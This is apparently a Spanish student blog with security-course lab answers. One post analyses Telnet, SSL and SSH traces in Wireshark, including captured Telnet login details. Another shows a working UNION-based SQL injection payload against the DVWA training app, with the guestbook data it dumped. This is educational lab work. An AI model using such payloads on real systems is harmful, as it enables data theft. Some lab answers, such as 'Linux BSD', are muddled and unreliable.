jueves, 1 de octubre de 2015

Sem2 - Tareas

Wireshark


Tarea1:

1.

Primera parte: analizando un protocolo inseguro - Telnet.


Traza con: telnet-raw.pcap
  • ¿Qué usuario y contraseña se ha utilizado para acceder al servidor de Telnet?
  • ¿Qué sistema operativo corre en la máquina?
  • ¿Qué comandos se ejecutan en esta sesión?
user:fake pw:user
Linux BSD
Comandos usados: echo, sbin, ping, ls -a, ls; www.yahoo.com ,exit,


2.

Segunda parte: analizando SSL.

Traza SSL: esta traza con tráfico SSL

  • ¿Puedes identificar en qué paquete de la trama el servidor envía el certificado?
  • ¿El certificado va en claro o está cifrado? ¿Puedes ver, por ejemplo, qué autoridad ha emitido el certificado?
  • ¿Qué asegura el certificado, la identidad del servidor o del cliente?

SSLv3 Record Layer: Handshake Protocol: Client Key Exchange
SSLv3 Record Layer: Change Cipher Spec Protocol: Change Cipher Spec

SSLv3 Record Layer: Handshake Protocol: Encrypted Handshake Message

Identidad cliente

3.

Tercera parte: analizando SSH.

Traza SSH: esta traza con tráfico SSH

  • ¿Puedes ver a partir de qué paquete comienza el tráfico cifrado?
  • ¿Qué protocolos viajan cifrados, todos (IP, TCP...) o alguno en particular?
  • ¿Es posible ver alguna información de usuario como contraseñas de acceso?
9 0.078259 192.168.0.14 193.146.78.18 SSHv2 646 Client: Key Exchange Init
SSH Version 2 (encryption:aes128-ctr mac:umac-64@openssh.com compression:none)
Message Code: Key Exchange Init (20)

TCP/UDP

No. Solo paquetes viajando.






Publicado por en No hay comentarios:
Reto con DVWA

%' and 1=0 union select null, concat(comment_id,0x0a,comment,0x0a,name,0x0a) from guestbook #

Vulnerability: SQL Injection

User ID:

 
ID: %' and 1=0 union select null, concat(comment_id,0x0a,comment,0x0a,name,0x0a) from guestbook #
First name: 
Surname: 1
This is a test comment.
test

ID: %' and 1=0 union select null, concat(comment_id,0x0a,comment,0x0a,name,0x0a) from guestbook #
First name: 
Surname: 2
These aren't the droids you'r looking for...
Obi-Wan Kenobi

ID: %' and 1=0 union select null, concat(comment_id,0x0a,comment,0x0a,name,0x0a) from guestbook #
First name: 
Surname: 3
The key is "use the force", Luke.
Yoda

ID: %' and 1=0 union select null, concat(comment_id,0x0a,comment,0x0a,name,0x0a) from guestbook #
First name: 
Surname: 4
Han Solo shot first!
Anonymous bystander

ID: %' and 1=0 union select null, concat(comment_id,0x0a,comment,0x0a,name,0x0a) from guestbook #
First name: 
Surname: 5
Master Kenobi, you disappoint me. Yoda holds you in such high steem. Surely you can do better!
Count Dooku

ID: %' and 1=0 union select null, concat(comment_id,0x0a,comment,0x0a,name,0x0a) from guestbook #
First name: 
Surname: 6
At last we will reveal ourselves to the Jedi. At last we will have revenge.
Darth Maul

ID: %' and 1=0 union select null, concat(comment_id,0x0a,comment,0x0a,name,0x0a) from guestbook #
First name: 
Surname: 10
Its a trap!
Admiral Ackbar
Publicado por en No hay comentarios:
Suscribirse a: Comentarios (Atom)